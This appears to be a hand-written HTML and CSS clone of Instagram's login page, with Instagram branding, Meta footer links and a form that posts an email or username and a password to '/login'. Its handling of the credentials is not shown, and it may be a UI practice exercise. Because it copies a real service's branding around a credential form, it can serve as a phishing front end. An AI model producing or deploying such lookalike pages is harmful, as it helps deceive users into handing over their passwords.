<!DOCTYPE html>
 <html lang="en">
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <title>Instagram</title>
   <style>
    body {
        font-family: Arial, Helvetica, sans-serif;
        padding: auto;
        background-color: rgb(247, 249, 249);
        margin: 25, 25;
        justify-content: center;
        align-items: flex-start;
        height: 100vh;

    }
    .login-container {
     display: flex;
     flex-direction: column;
     justify-content: center;
     align-items: center;
     height: auto;
     padding: 40px;
    }
    .login-box{
      padding: 23%;
      align-items: center;
      background-color: rgb(253, 251, 251);
      border-radius: 1px;
      border: 1px solid #ccc;
      box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
      width: 150px;
      margin: 20px;
      height: 190px;
      margin-bottom: -20px;
      padding-top: 100px;
      margin-top: -25px;
        }
        image {
            display: flex;
            justify-content: center;
            align-items: center;
            margin-top: -20px;
            
            
        }
        .login-box img {
            width: 100px;
            height: 50px;
            margin-bottom: 20px;
            margin-top: -200px;
            margin-left: 20px;
            
            
        }    
        .login-box input[type="text"],
        .login-box input[type="password"] {
            width: 140%;
            padding: 10px;
            margin: 0px 20px;
            margin-bottom: 5px;
            border: 1px solid #ccc;
            border-radius: 5px;
            margin-left: -45px;    
        }
        .login-box button {
            width: 155%;
            padding: 10px;
            margin-left: -45px;
            background-color: #054ef7;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            margin-top: 10px;
        }
        .login-box button:hover {
            background: #68a4e4;
        }
       .seperator {
            display: flex;
            align-items: center;
            justify-content: center;
            margin-top: 20px;
            width: 150%;
            margin-left: -40px;
        }
        .seperator hr {
            width: 100%;
            border: 0;
            border-top: 1px solid #767575;
        }
        .seperator span {
            margin: 0 10px;
            font-size: 10px;
            color: #999;
        }
        
       .login-box .show-password {
            display: flex;
            align-items: center;
            margin-bottom: 10px;
        }
        .login-box a {
            color: #054ef7;
            text-decoration: none;
            font-size: 14px;
            font-weight: lighter;
            margin-top: 10px;
            text-align: center;
            display: block;
        }
        .login-box a:hover {
            text-decoration: underline;
        }
        .forgot-password {
            text-align: center;
            margin-top: 30px;    
        }
        .forgot-password a {
            color: #101011;
            text-decoration: none;
            font-size: 14px;
            font-weight: lighter;
        }  
       h1 {
            text-align: center;
            margin-top: 30px;
            color: #101011;
            font-weight: 300;
            font-size: small;
            margin-right: 50px;
            margin-bottom: 50px;
        }
        .new-account {
            text-align: center;
            margin-top: -68px;
            margin-left: 150px;
        }
        h2 {
            text-align: center;
            margin-top: 60px;
            color: #6f6f79;
            font-weight: 300;
            font-size: small;
            word-spacing: 25px;
            
            
        }

        h3 {
            text-align: center;
            margin-top: 20px;
            margin-bottom: 10px;
            color: #80808a;
            font-weight: 300;
            font-size: small;
        }
        
            
         
            
            
        
     
   </style>
 <body>
        <div class="login-container">
            <div class="login-box">
                 <div class="image">
                    <img src="images/instagramc.png">
                    <form action="/login" method="post">
                      <input type="text" name="email" placeholder="Email or username" required>
                      <input type="password" name="password" placeholder="Password" required>
                      <button type="submit">Login</button>
                    </form>
                <div class="seperator">
                    <hr>
                    <span>OR</span>
                    <hr>
                </div>
                <div class="forgot-password">
                    <a href="#">Forgot password?</a>
                 </div>
                 </div>
            </div>
            </div>
        </div>
        <h1>Dont have an account?</h1>
        <div class="new-account">
            <a href="#">sign up</a>
        </div>
        <h2>
           Meta About Blog Jobs Help API Privacy Terms Locations Instagram Lite Threads Contact Uploading & Non-Users Meta Verified
        </h2>
        <h3>
          English
        © 2025 Instagram from Meta
        </h3>
                
        
 </body>       
</html>